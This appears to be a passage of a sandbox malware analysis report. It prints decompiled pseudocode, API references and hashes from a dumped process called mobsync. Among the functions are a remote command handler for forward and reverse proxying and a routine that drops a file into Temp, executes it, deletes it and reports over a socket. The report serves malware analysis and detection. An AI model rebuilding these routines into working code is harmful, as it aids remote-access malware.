0x004453ae
0x004453b1
0x004453b2
0x00000000
0x004453ba
0x0044521b
0x004451d0
0x004451d5
0x004451dc
0x004451e2
0x00000000
0x004451e2
0x004451aa
0x004451ad
0x004451b7
0x004451b7
0x004451ba
0x004451bd
0x00000000
0x004451bd
0x004451b1
0x004451b3
0x004451b5
0x00000000
0x00000000
0x00000000
0x004451b5
0x00445161
0x00445166
0x0044516e
0x00000000
0x004450f9
0x004450fe
0x00445101
0x00445106
0x00445493
0x00000000
0x00445493

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15b801faffc6f894a74e6baf8d504461a40987412e2fb147652187745709a7c8
Instruction ID: d415aa42f168db04541a2b881a195995a4068d2056edb743f6be97fc2ac4bfb3
Opcode Fuzzy Hash: 15b801faffc6f894a74e6baf8d504461a40987412e2fb147652187745709a7c8
Instruction Fuzzy Hash: A1C10971D04749AFEF11DFA9C841BAEBBB4AF09304F18009AE8149B393D7789D41CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0044DA45, Relevance: 13.8, APIs: 9, Instructions: 268
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0044DA45(void* __ebx, void* __edi, void* __esi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				short* _v32;
				int _v36;
				char* _v40;
				int _v44;
				intOrPtr _v48;
				void* _v60;
				signed int _t63;
				int _t70;
				signed int _t72;
				short* _t73;
				signed int _t77;
				short* _t87;
				void* _t89;
				void* _t92;
				int _t99;
				intOrPtr _t101;
				intOrPtr _t102;
				signed int _t112;
				char* _t114;
				char* _t115;
				void* _t120;
				void* _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr* _t125;
				short* _t126;
				int _t128;
				int _t129;
				short* _t130;
				intOrPtr* _t131;
				signed int _t132;
				short* _t133;

				_t63 =  *0x46a00c; // 0x44c884ad
				_v8 = _t63 ^ _t132;
				_t128 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t67 = _a24;
				_v40 = _a24;
				_t125 = _a16;
				_v36 = _t125;
				if(_t128 <= 0) {
					if(_t128 >= 0xffffffff) {
						goto L2;
					} else {
						goto L5;
					}
				} else {
					_t128 = L0043EE69(_t125, _t128);
					_t67 = _v40;
					L2:
					_t99 = _a28;
					if(_t99 <= 0) {
						if(_t99 < 0xffffffff) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						_t99 = L0043EE69(_t67, _t99);
						L7:
						_t70 = _a32;
						if(_t70 == 0) {
							_t70 =  *( *_v44 + 8);
							_a32 = _t70;
						}
						if(_t128 == 0 || _t99 == 0) {
							if(_t128 != _t99) {
								if(_t99 <= 1) {
									if(_t128 <= 1) {
										if(GetCPInfo(_t70,  &_v28) == 0) {
											goto L5;
										} else {
											if(_t128 <= 0) {
												if(_t99 <= 0) {
													goto L36;
												} else {
													_t89 = 2;
													if(_v28 >= _t89) {
														_t114 =  &_v22;
														if(_v22 != 0) {
															_t131 = _v40;
															while(1) {
																_t122 =  *((intOrPtr*)(_t114 + 1));
																if(_t122 == 0) {
																	goto L15;
																}
																_t101 =  *_t131;
																if(_t101 <  *_t114 || _t101 > _t122) {
																	_t114 = _t114 + _t89;
																	if( *_t114 != 0) {
																		continue;
																	} else {
																		goto L15;
																	}
																}
																goto L63;
															}
														}
													}
													goto L15;
												}
											} else {
												_t92 = 2;
												if(_v28 >= _t92) {
													_t115 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t123 =  *((intOrPtr*)(_t115 + 1));
															if(_t123 == 0) {
																goto L17;
															}
															_t102 =  *_t125;
															if(_t102 <  *_t115 || _t102 > _t123) {
																_t115 = _t115 + _t92;
																if( *_t115 != 0) {
																	continue;
																} else {
																	goto L17;
																}
															}
															goto L63;
														}
													}
												}
												goto L17;
											}
										}
									} else {
										L17:
										_push(3);
										goto L13;
									}
								} else {
									L15:
								}
							} else {
								_push(2);
								L13:
							}
						} else {
							L36:
							_t126 = 0;
							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t128, 0, 0);
							_v44 = _t72;
							if(_t72 == 0) {
								L5:
							} else {
								_t120 = _t72 + _t72;
								asm("sbb eax, eax");
								if((_t120 + 0x00000008 & _t72) == 0) {
									_t73 = 0;
									_v32 = 0;
									goto L45;
								} else {
									asm("sbb eax, eax");
									_t85 = _t72 & _t120 + 0x00000008;
									_t112 = _t120 + 8;
									if((_t72 & _t120 + 0x00000008) > 0x400) {
										asm("sbb eax, eax");
										_t87 = E0043E61D(_t112, _t85 & _t112);
										_v32 = _t87;
										if(_t87 == 0) {
											goto L61;
										} else {
											 *_t87 = 0xdddd;
											goto L43;
										}
									} else {
										asm("sbb eax, eax");
										E00450080();
										_t87 = _t133;
										_v32 = _t87;
										if(_t87 == 0) {
											L61:
											_t100 = _v32;
										} else {
											 *_t87 = 0xcccc;
											L43:
											_t73 =  &(_t87[4]);
											_v32 = _t73;
											L45:
											if(_t73 == 0) {
												goto L61;
											} else {
												_t129 = _a32;
												if(MultiByteToWideChar(_t129, 1, _v36, _t128, _t73, _v44) == 0) {
													goto L61;
												} else {
													_t77 = MultiByteToWideChar(_t129, 9, _v40, _t99, _t126, _t126);
													_v36 = _t77;
													if(_t77 == 0) {
														goto L61;
													} else {
														_t121 = _t77 + _t77;
														_t108 = _t121 + 8;
														asm("sbb eax, eax");
														if((_t121 + 0x00000008 & _t77) == 0) {
															_t130 = _t126;
															goto L56;
														} else {
															asm("sbb eax, eax");
															_t81 = _t77 & _t121 + 0x00000008;
															_t108 = _t121 + 8;
															if((_t77 & _t121 + 0x00000008) > 0x400) {
																asm("sbb eax, eax");
																_t130 = E0043E61D(_t108, _t81 & _t108);
																_pop(_t108);
																if(_t130 == 0) {
																	goto L59;
																} else {
																	 *_t130 = 0xdddd;
																	goto L54;
																}
															} else {
																asm("sbb eax, eax");
																E00450080();
																_t130 = _t133;
																if(_t130 == 0) {
																	L59:
																	_t100 = _v32;
																} else {
																	 *_t130 = 0xcccc;
																	L54:
																	_t130 =  &(_t130[4]);
																	L56:
																	if(_t130 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t130, _v36) == 0) {
																		goto L59;
																	} else {
																		_t100 = _v32;
																		_t126 = L00440DAB(_t108, _t130, _v48, _a12, _v32, _v44, _t130, _v36, _t126, _t126, _t126);
																	}
																}
															}
														}
														E004304BD(_t130);
													}
												}
											}
										}
									}
								}
								E004304BD(_t100);
							}
						}
					}
				}
				L63:
				return E0042F61B(_v8 ^ _t132);
			}

0x0044da4d
0x0044da54
0x0044da5c
0x0044da5f
0x0044da65
0x0044da68
0x0044da6b
0x0044da6f
0x0044da72
0x0044da77
0x0044da9e
0x00000000
0x00000000
0x00000000
0x00000000
0x0044da79
0x0044da81
0x0044da83
0x0044da87
0x0044da87
0x0044da8c
0x0044daaa
0x00000000
0x00000000
0x00000000
0x00000000
0x0044da8e
0x0044da97
0x0044daac
0x0044daac
0x0044dab1
0x0044dab8
0x0044dabb
0x0044dabb
0x0044dac0
0x0044dacc
0x0044dad9
0x0044dae6
0x0044daf9
0x00000000
0x0044dafb
0x0044dafd
0x0044db30
0x00000000
0x0044db32
0x0044db34
0x0044db38
0x0044db3e
0x0044db41
0x0044db43
0x0044db46
0x0044db46
0x0044db4b
0x00000000
0x00000000
0x0044db4d
0x0044db51
0x0044db5b
0x0044db60
0x00000000
0x0044db62
0x00000000
0x0044db62
0x0044db60
0x00000000
0x0044db51
0x0044db46
0x0044db41
0x00000000
0x0044db38
0x0044daff
0x0044db01
0x0044db05
0x0044db0b
0x0044db0e
0x0044db10
0x0044db10
0x0044db15
0x00000000
0x00000000
0x0044db17
0x0044db1b
0x0044db25
0x0044db2a
0x00000000
0x0044db2c
0x00000000
0x0044db2c
0x0044db2a
0x00000000
0x0044db1b
0x0044db10
0x0044db0e
0x00000000
0x0044db05
0x0044dafd
0x0044dae8
0x0044dae8
0x0044dae8
0x00000000
0x0044dae8
0x0044dadb
0x0044dadb
0x0044dadd
0x0044dace
0x0044dace
0x0044dad0
0x0044dad0
0x0044db67
0x0044db67
0x0044db67
0x0044db74
0x0044db7a
0x0044db7f
0x0044daa0
0x0044db85
0x0044db85
0x0044db8d
0x0044db91
0x0044dbec
0x0044dbee
0x00000000
0x0044db93
0x0044db98
0x0044db9a
0x0044db9c
0x0044dba4
0x0044dbc8
0x0044dbcd
0x0044dbd2
0x0044dbd8
0x00000000
0x0044dbde
0x0044dbde
0x00000000
0x0044dbde
0x0044dba6
0x0044dba8
0x0044dbac
0x0044dbb1
0x0044dbb3
0x0044dbb8
0x0044dccd
0x0044dccd
0x0044dbbe
0x0044dbbe
0x0044dbe4
0x0044dbe4
0x0044dbe7
0x0044dbf1
0x0044dbf3
0x00000000
0x0044dbf9
0x0044dc01
0x0044dc0f
0x00000000
0x0044dc15
0x0044dc1e
0x0044dc24
0x0044dc29
0x00000000
0x0044dc2f
0x0044dc2f
0x0044dc32
0x0044dc37
0x0044dc3b
0x0044dc87
0x00000000
0x0044dc3d
0x0044dc42
0x0044dc44
0x0044dc46
0x0044dc4e
0x0044dc6b
0x0044dc75
0x0044dc77
0x0044dc7a
0x00000000
0x0044dc7c
0x0044dc7c
0x00000000
0x0044dc7c
0x0044dc50
0x0044dc52
0x0044dc56
0x0044dc5b
0x0044dc5f
0x0044dcc1
0x0044dcc1
0x0044dc61
0x0044dc61
0x0044dc82
0x0044dc82
0x0044dc89
0x0044dc8b
0x00000000
0x0044dca4
0x0044dca4
0x0044dcbd
0x0044dcbd
0x0044dc8b
0x0044dc5f
0x0044dc4e
0x0044dcc5
0x0044dcca
0x0044dc29
0x0044dc0f
0x0044dbf3
0x0044dbb8
0x0044dba4
0x0044dcd1
0x0044dcd7
0x0044db7f
0x0044dac0
0x0044da8c
0x0044dcd9
0x0044dcec

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0044DD1E,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0044DAF1
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0044DD1E,00000000,00000000,?,00000001,?,?,?,?), ref: 0044DB74
__alloca_probe_16.LIBCMT ref: 0044DBAC
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0044DD1E,?,0044DD1E,00000000,00000000,?,00000001,?,?,?,?), ref: 0044DC07
__alloca_probe_16.LIBCMT ref: 0044DC56
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0044DD1E,00000000,00000000,?,00000001,?,?,?,?), ref: 0044DC1E

Part of subcall function 0043E61D: HeapAlloc.KERNEL32(00000000,0042F939,?,?,00431057,?,?,?,?,?,0040BA4E,0042F939,?,?,?,?), ref: 0043E64F

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0044DD1E,00000000,00000000,?,00000001,?,?,?,?), ref: 0044DC9A
__freea.LIBCMT ref: 0044DCC5
__freea.LIBCMT ref: 0044DCD1

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
String ID:
API String ID: 3256262068-0
Opcode ID: b1c0ae2a3b9276eb3bea09c8773a07353bdcefd21388488c19bbf8527fa40fb4
Instruction ID: 32459ac01eef459e87745deb4d3fcc9efc23f9fccd5395e8f543d2d3ef9bbe94
Opcode Fuzzy Hash: b1c0ae2a3b9276eb3bea09c8773a07353bdcefd21388488c19bbf8527fa40fb4
Instruction Fuzzy Hash: 6D91B171E042169AFF208E65CC81EAFBBB5EF09714F14456BE901E7381D769DC40C769

Uniqueness

Uniqueness Score: -1.00%

Function 0040F248, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E0040F248(char* __edx, void* __eflags, intOrPtr _a4) {
				char _v32;
				char _v56;
				void* _v60;
				char _v72;
				char _v76;
				char _v80;
				char _v88;
				char _v92;
				void* _v96;
				char _v108;
				char _v112;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr* _t23;
				void* _t29;
				char* _t32;
				intOrPtr _t45;
				char* _t46;
				char* _t53;
				char* _t58;
				intOrPtr _t110;
				void* _t114;
				void* _t115;
				char* _t117;
				void* _t118;
				void* _t119;
				void* _t121;
				signed int _t123;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t132;

				_t134 = __eflags;
				_t101 = __edx;
				_push(_t61);
				_t110 = _a4;
				E004020CC(_t61,  &_v76, __edx, __eflags, _t110 + 0x1c);
				SetEvent( *(_t110 + 0x34));
				_t23 = L00401F75( &_v80);
				E00404286( &_v80,  &_v56, 4, 0xffffffff);
				_t126 = (_t123 & 0xfffffff8) - 0x3c;
				E004020CC(_t61, _t126, _t101, _t134, 0x46c238);
				_t127 = _t126 - 0x18;
				E004020CC(_t61, _t127, _t101, _t134,  &_v72);
				_t29 = L00416DD0( &_v112, _t101);
				_t128 = _t127 + 0x30;
				_t114 =  *_t23 - 0x46;
				if(_t114 == 0) {
					_t32 = E0040A15B(L00401F75(L00401E29( &_v88, _t101, __eflags, 1)));
					_t61 = _t32;
					__eflags = _t32;
					if(__eflags == 0) {
						_t115 = _t128 - 0x18;
						_push("1");
						L19:
						_t101 = L00402F97( &_v32, L00401E29( &_v88, _t101, __eflags, 0), 0x46c238);
						E0040530D(_t61, _t115, _t34, _t110, __eflags);
						_push(0x85);
						E00404A6E(_t61, _t110, _t34, __eflags);
						L00401FA7();
						L20:
						L00401E54( &_v108, _t101);
						L00401FA7();
						L00401FA7();
						return 0;
					}
					_t117 = E0040A1B1(_t61, "StartForward");
					 *0x46bd3c = _t117;
					 *0x46bd38 = E0040A1B1(_t61, "StartReverse");
					 *0x46bd40 = E0040A1B1(_t61, "StopForward");
					_t45 = E0040A1B1(_t61, "StopReverse");
					_t101 = "GetDirectListeningPort";
					 *0x46bd48 = _t45;
					_t46 = E0040A1B1(_t61, "GetDirectListeningPort");
					 *0x46bd44 = _t46;
					__eflags = _t117;
					if(__eflags == 0) {
						L17:
						_t115 = _t128 - 0x18;
						_push("2");
						goto L19;
					}
					__eflags =  *0x46bd38;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *0x46bd40;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags = _t46;
					if(__eflags == 0) {
						goto L17;
					}
					 *0x46bd4c = 1;
					E004020CC(_t61, _t128 - 0x18, "GetDirectListeningPort", __eflags, L00401E29( &_v88, "GetDirectListeningPort", __eflags, 0));
					_push(0x76);
					L10:
					E00404A6E(_t61, _t110, _t101, __eflags);
					goto L20;
				}
				_t118 = _t114 - 1;
				if(_t118 == 0) {
					_t53 =  *0x46bd3c(E00436079(_t50, L00401F75(L00401E29( &_v88, _t101, __eflags, 0))));
					_t132 = _t128 - 0x14;
					L9:
					_t101 = _t53;
					L00416B7E(_t61, _t132, _t53);
					_push(0x77);
					goto L10;
				}
				_t119 = _t118 - 1;
				if(_t119 == 0) {
					__imp__#12( *0x46c774);
					_t58 =  *0x46bd38(_t29, E00436079(_t55, L00401F75(L00401E29( &_v92, _t101, __eflags, 0))) & 0x0000ffff);
					__eflags = _t58;
					_t99 =  !=  ? 1 :  *0x46bd4d & 0x000000ff;
					 *0x46bd4d =  !=  ? 1 :  *0x46bd4d & 0x000000ff;
					_t101 = _t58;
					L00416B7E(_t61, _t128 - 0x10, _t58);
					_push(0x78);
					goto L10;
				}
				_t121 = _t119 - 1;
				if(_t121 == 0) {
					_t53 =  *0x46bd40();
					_t132 = _t128 - 0x18;
					goto L9;
				}
				if(_t121 == 1) {
					 *0x46bd48();
					 *0x46bd4d = 0;
				}
				goto L20;
			}

0x0040f248
0x0040f248
0x0040f255
0x0040f258
0x0040f25f
0x0040f267
0x0040f271
0x0040f285
0x0040f28a
0x0040f294
0x0040f299
0x0040f2a3
0x0040f2ac
0x0040f2b1
0x0040f2b4
0x0040f2b7
0x0040f39b
0x0040f3a0
0x0040f3a2
0x0040f3a4
0x0040f44f
0x0040f451
0x0040f456
0x0040f472
0x0040f476
0x0040f47c
0x0040f483
0x0040f48c
0x0040f491
0x0040f495
0x0040f49e
0x0040f4a7
0x0040f4b4
0x0040f4b4
0x0040f3b6
0x0040f3bf
0x0040f3cf
0x0040f3e0
0x0040f3e7
0x0040f3ec
0x0040f3f1
0x0040f3f8
0x0040f3fd
0x0040f402
0x0040f404
0x0040f440
0x0040f443
0x0040f445
0x00000000
0x0040f445
0x0040f406
0x0040f40d
0x00000000
0x00000000
0x0040f40f
0x0040f416
0x00000000
0x00000000
0x0040f418
0x0040f41a
0x00000000
0x00000000
0x0040f422
0x0040f434
0x0040f439
0x0040f37b
0x0040f37d
0x00000000
0x0040f37d
0x0040f2bd
0x0040f2c0
0x0040f367
0x0040f36d
0x0040f370
0x0040f370
0x0040f374
0x0040f379
0x00000000
0x0040f379
0x0040f2c6
0x0040f2c9
0x0040f2fc
0x0040f322
0x0040f332
0x0040f334
0x0040f33a
0x0040f340
0x0040f344
0x0040f349
0x00000000
0x0040f349
0x0040f2cb
0x0040f2ce
0x0040f2eb
0x0040f2f1
0x00000000
0x0040f2f1
0x0040f2d3
0x0040f2d9
0x0040f2df
0x0040f2df
0x00000000

APIs

SetEvent.KERNEL32(?,?), ref: 0040F267
inet_ntoa.WS2_32 ref: 0040F2FC

Strings

GetDirectListeningPort, xrefs: 0040F3EC
StartReverse, xrefs: 0040F3B8
StopReverse, xrefs: 0040F3DB
StartForward, xrefs: 0040F3AA
StopForward, xrefs: 0040F3CA

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Eventinet_ntoa
String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
API String ID: 3578746661-168337528
Opcode ID: e0ab2afbf41799fec12aa93384342da96b552639a4a70b4eb6abd1fe1eaf104b
Instruction ID: f9a444815650af3872de27879d45234466d6e45f99ea988061a4b43b2ad98d54
Opcode Fuzzy Hash: e0ab2afbf41799fec12aa93384342da96b552639a4a70b4eb6abd1fe1eaf104b
Instruction Fuzzy Hash: 3351D631A043019BC714BB79DC5AA6E36A59B91318F40453FF801AB6E2EF7C994887DF

Uniqueness

Uniqueness Score: -1.00%

Function 004136BA, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 108
filesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E004136BA(void* __eflags, char _a4, char _a28) {
				char _v28;
				struct _SHELLEXECUTEINFOA _v88;
				char _v112;
				char _v136;
				char _v316;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				void* _t41;
				intOrPtr _t50;
				signed int _t60;
				char* _t68;
				void* _t73;
				void* _t87;
				void* _t90;

				_t93 = __eflags;
				_t33 = E00402064(_t60,  &_v136, "\\");
				_t86 = E004075C4(_t60,  &_v112, E0043919A(_t60, __eflags, "Temp"), _t87, _t93, _t33);
				L00402F73(_t60,  &_v28, _t35, _t93,  &_a4);
				L00401FA7();
				_t68 =  &_v136;
				L00401FA7();
				_push(_t68);
				_push(_t68);
				_t41 = E004138F7(E0040D8E4( &_v316, _t35, _t93, L00401F75( &_v28), 0x10),  &_v316);
				_t94 = _t41;
				if(_t41 == 0) {
					E00402064(_t60, _t90 - 0x18, 0x45f6ac);
					_push(0x6f);
					_t73 = 0x46c7e8;
					goto L6;
				} else {
					_t86 =  &_a28;
					E00413907( &_v316,  &_a28, _t94);
					E0040D895( &_v316,  &_a28, _t94);
					_v88.hwnd = _v88.hwnd & 0x00000000;
					_v88.lpVerb = _v88.lpVerb & 0x00000000;
					_v88.cbSize = 0x3c;
					_v88.fMask = 0x40;
					_t50 = L00401F75( &_v28);
					asm("movaps xmm0, [0x466080]");
					_v88.lpFile = _t50;
					asm("movups [ebp-0x40], xmm0");
					_t60 = _t60 & 0xffffff00 | ShellExecuteExA( &_v88) != 0x00000000;
					_t96 = _v88.hProcess;
					if(_v88.hProcess != 0) {
						E00402064(_t60, _t90, 0x45f6ac);
						_push(0x70);
						E00404A6E(_t60, 0x46c7e8,  &_a28, _t96);
						WaitForSingleObject(_v88.hProcess, 0xffffffff);
						CloseHandle(_v88.hProcess);
						DeleteFileA(L00401F75( &_v28));
					}
					_t97 = _t60 - 1;
					if(_t60 == 1) {
						E00402064(_t60, _t90 - 0x18, 0x45f6ac);
						_push(0x6e);
						_t73 = 0x46c7e8;
						L6:
						E00404A6E(_t60, _t73, _t86, _t97);
					}
				}
				L0040CFAB(_t60,  &_v316, 0x45f6ac);
				L00401FA7();
				L00401FA7();
				return L00401FA7();
			}

0x004136ba
0x004136d5
0x004136f1
0x004136f6
0x004136ff
0x00413704
0x0041370a
0x0041370f
0x00413710
0x0041372d
0x00413732
0x00413734
0x004137f5
0x004137fa
0x004137fc
0x00000000
0x0041373a
0x0041373a
0x00413743
0x0041374e
0x00413753
0x0041375a
0x0041375e
0x00413765
0x0041376c
0x00413771
0x00413778
0x0041377f
0x00413795
0x00413798
0x0041379c
0x004137a4
0x004137a9
0x004137ad
0x004137b7
0x004137c0
0x004137cf
0x004137cf
0x004137d5
0x004137d8
0x004137e0
0x004137e5
0x004137e7
0x00413801
0x00413801
0x00413801
0x004137d8
0x0041380c
0x00413814
0x0041381c
0x0041382f

APIs

Part of subcall function 00413907: __EH_prolog.LIBCMT ref: 0041390C

WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,Function_0005F6AC), ref: 004137B7
CloseHandle.KERNEL32(00000000), ref: 004137C0
DeleteFileA.KERNEL32(00000000), ref: 004137CF
ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00413783

Part of subcall function 00404A6E: send.WS2_32 ref: 00404AE2

Strings

Temp, xrefs: 004136DB
@, xrefs: 00413765
<, xrefs: 0041375E

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
String ID: <$@$Temp
API String ID: 1704390241-1032778388
Opcode ID: e2703b10d402c05202fcf2157205eac5ddd388622be69da6604f37d5098a59b6
Instruction ID: 2f37397737ec95128bf32f0f6142d0e98911ade1772a95a98b29c58449e4e073
Opcode Fuzzy Hash: e2703b10d402c05202fcf2157205eac5ddd388622be69da6604f37d5098a59b6
Instruction Fuzzy Hash: D3417C719002099ADB14FB61CC56AEEB734AF00319F40417EF505760E2EF7C1B8ACB99

Uniqueness

Uniqueness Score: -1.00%

Function 0044326D, Relevance: 12.2, APIs: 8, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0044326D(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x46a00c; // 0x44c884ad
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = L0043EE69(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E0042F61B(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E004304BD(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E0044132F(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E004304BD(_t101);
									goto L36;
								}
								_t62 = E0044132F(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E004304BD(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E0043E61D(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E00450080();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E0044132F(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E0043E61D(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00450080();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}

0x00443272
0x00443273
0x00443274
0x0044327b
0x0044327f
0x00443280
0x00443286
0x0044328c
0x00443292
0x00443295
0x00443295
0x00443298
0x0044329a
0x0044329a
0x00443298
0x0044329c
0x004432a1
0x004432a8
0x004432ab
0x004432ab
0x004432c7
0x004432cd
0x004432d2
0x00443465
0x00443478
0x004432d8
0x004432d8
0x004432db
0x004432e0
0x004432e4
0x00443338
0x00443338
0x0044333a
0x0044333c
0x0044345a
0x0044345a
0x0044345c
0x0044345d
0x00000000
0x00443463
0x0044334d
0x00443353
0x00443355
0x00000000
0x00000000
0x0044335b
0x0044336d
0x00443372
0x00443376
0x00000000
0x00000000
0x00443383
0x004433bd
0x004433c0
0x004433c3
0x004433c5
0x004433c7
0x004433c9
0x00443415
0x00443415
0x00443417
0x00443417
0x00443419
0x00443453
0x00443454
0x00000000
0x00443459
0x0044342d
0x00443432
0x00443434
0x00000000
0x00000000
0x00443438
0x00443439
0x0044343a
0x0044343d
0x00443479
0x0044347c
0x0044343f
0x0044343f
0x00443440
0x00443440
0x0044344d
0x0044344f
0x00443451
0x00443482
0x00000000
0x00000000
0x00000000
0x00000000
0x00443451
0x004433cb
0x004433ce
0x004433d0
0x004433d2
0x004433d4
0x004433d7
0x004433dc
0x004433f7
0x004433f9
0x00443403
0x00443405
0x00443406
0x00443408
0x00000000
0x00000000
0x0044340a
0x00443410
0x00443410
0x00000000
0x00443410
0x004433de
0x004433e0
0x004433e4
